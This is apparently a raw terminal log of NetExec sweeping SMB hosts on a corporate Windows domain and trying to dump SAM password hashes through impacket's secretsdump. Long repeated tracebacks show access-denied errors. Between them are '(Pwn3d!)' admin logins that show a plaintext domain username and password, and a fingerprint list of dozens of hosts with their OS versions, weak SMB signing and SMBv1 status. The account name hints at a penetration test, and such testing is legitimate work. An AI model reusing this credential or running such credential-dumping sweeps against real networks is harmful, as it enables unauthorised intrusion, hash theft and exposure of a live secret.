│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.160.37 445 OXODT020008 [+] Cevital.com\


oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:24:20] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.160.130 445 OXODT020013 [+] Cevital.com\


oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.17 445 OXODT020041 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:24:21] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.160.40 445 OXODT020121 [+] Cevital.com\


oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.126 445 OXOLT020044 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.41 445 OXODT020082 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:24:22] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.160.64 445 OXODT02070006 [+] Cevital.com\


oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:24:23] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied


smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.162.129 445 OXOASP02004 [*] Windows Server 2022 Build


20348 x64 (name:OXOASP02004) (domain:Cevital.com) (signing:False) (SMBv1:False)
SMB 10.34.160.109 445 AKS160001 [*] Windows 5.1 x32
(name:AKS160001) (domain:AKS160001) (signing:False) (SMBv1:True)
SMB 10.34.162.132 445 OXXVSRV2000 [*] Windows Server 2022 Build
20348 x64 (name:OXXVSRV2000) (domain:Cevital.com) (signing:False) (SMBv1:False)
SMB 10.34.162.131 445 OXXSDC0202 [*] Windows Server 2022 Build
20348 x64 (name:OXXSDC0202) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.89 445 INTERHM [*] Windows 8.1 Pro 9600 x64
(name:INTERHM) (domain:interhm) (signing:False) (SMBv1:True)
SMB 10.34.162.139 445 OXOASP02002 [*] Windows Server 2022 Build
20348 x64 (name:OXOASP02002) (domain:Cevital.com) (signing:False) (SMBv1:False)
SMB 10.34.162.135 445 OXOASP02011 [*] Windows Server 2022 Build
20348 x64 (name:OXOASP02011) (domain:Cevital.com) (signing:False) (SMBv1:False)
SMB 10.34.162.142 445 OXOAST02003 [*] Windows 10 / Server 2019
Build 17763 x64 (name:OXOAST02003) (domain:Cevital.com) (signing:False)
(SMBv1:False)
SMB 10.34.162.140 445 OXOASP02018 [*] Windows 10 / Server 2019
Build 17763 x64 (name:OXOASP02018) (domain:Cevital.com) (signing:False)
(SMBv1:False)
SMB 10.34.160.152 445 LA26300001 [*] Windows 5.1 x32
(name:LA26300001) (domain:La26300001) (signing:False) (SMBv1:True)
SMB 10.34.162.156 445 OXOASP02016 [*] Windows Server 2019
Standard 17763 x64 (name:OXOASP02016) (domain:Cevital.com) (signing:False)
(SMBv1:True)
ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.162.141 445 OXOBIP02001 [*] Windows Server 2022 Build


20348 x64 (name:OXOBIP02001) (domain:Cevital.com) (signing:False) (SMBv1:False)
SMB 10.34.162.158 445 OXODBP02002 [*] Windows 10 / Server 2019
Build 17763 x64 (name:OXODBP02002) (domain:Cevital.com) (signing:False)
(SMBv1:False)
SMB 10.34.162.149 445 OXOASP02017 [*] Windows Server 2019
Standard 17763 x64 (name:OXOASP02017) (domain:Cevital.com) (signing:False)
(SMBv1:True)
SMB 10.34.162.143 445 OXOSCCM02001 [*] Windows Server 2022 Build
20348 x64 (name:OXOSCCM02001) (domain:Cevital.com) (signing:False) (SMBv1:False)
SMB 10.34.162.160 445 OXOPMP02001 [*] Windows Server 2022 Build
20348 x64 (name:OXOPMP02001) (domain:Cevital.com) (signing:False) (SMBv1:False)
SMB 10.34.162.161 445 OXOPMP02002 [*] Windows Server 2022 Build
20348 x64 (name:OXOPMP02002) (domain:Cevital.com) (signing:False) (SMBv1:False)
SMB 10.34.160.60 445 6120C-112 [*] Windows 7 Professional 7601
Service Pack 1 x32 (name:6120C-112) (domain:6120C-112) (signing:False) (SMBv1:True)
SMB 10.34.162.153 445 OXOASD02001 [*] Windows Server 2022 Build
20348 x64 (name:OXOASD02001) (domain:Cevital.com) (signing:False) (SMBv1:False)
SMB 10.34.162.166 445 OXOASP02005 [*] Windows Server 2022 Build
20348 x64 (name:OXOASP02005) (domain:Cevital.com) (signing:False) (SMBv1:False)
SMB 10.34.162.152 445 OXOBSP02001 [*] Windows 10 / Server 2019
Build 17763 x64 (name:OXOBSP02001) (domain:Cevital.com) (signing:False)
(SMBv1:False)
SMB 10.34.162.146 445 OXOASP02009 [*] Windows Server 2022 Build
20348 x64 (name:OXOASP02009) (domain:Cevital.com) (signing:False) (SMBv1:False)
SMB 10.34.162.159 445 OXOASP02010 [*] Windows Server 2022 Build
20348 x64 (name:OXOASP02010) (domain:Cevital.com) (signing:False) (SMBv1:False)
SMB 10.34.162.192 445 OXOASP02024 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXOASP02024) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.162.170 445 OXOASP02015 [*] Windows Server 2022 Build
20348 x64 (name:OXOASP02015) (domain:Cevital.com) (signing:False) (SMBv1:False)
SMB 10.34.160.32 445 OXODT020131 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.162.164 445 OXOASP02022 [*] Windows Server 2022 Build
20348 x64 (name:OXOASP02022) (domain:Cevital.com) (signing:False) (SMBv1:False)
SMB 10.34.162.171 445 OXOASP02019 [*] Windows Server 2022 Build
20348 x64 (name:OXOASP02019) (domain:Cevital.com) (signing:False) (SMBv1:False)
SMB 10.34.162.188 445 OXOBSP02002 [*] Windows 10 / Server 2019
Build 17763 x64 (name:OXOBSP02002) (domain:Cevital.com) (signing:False)
(SMBv1:False)
SMB 10.34.162.133 445 OXXVSRV2001 [*] Windows Server 2022 Build
20348 x64 (name:OXXVSRV2001) (domain:Cevital.com) (signing:False) (SMBv1:False)
SMB 10.34.162.134 445 OXXVSRV2002 [*] Windows 10 / Server 2019
Build 17763 x64 (name:OXXVSRV2002) (domain:Cevital.com) (signing:False)
(SMBv1:False)
[03:24:24] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied


smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.162.164 445 OXOASP02022 [+] Cevital.com\


oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:24:26] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

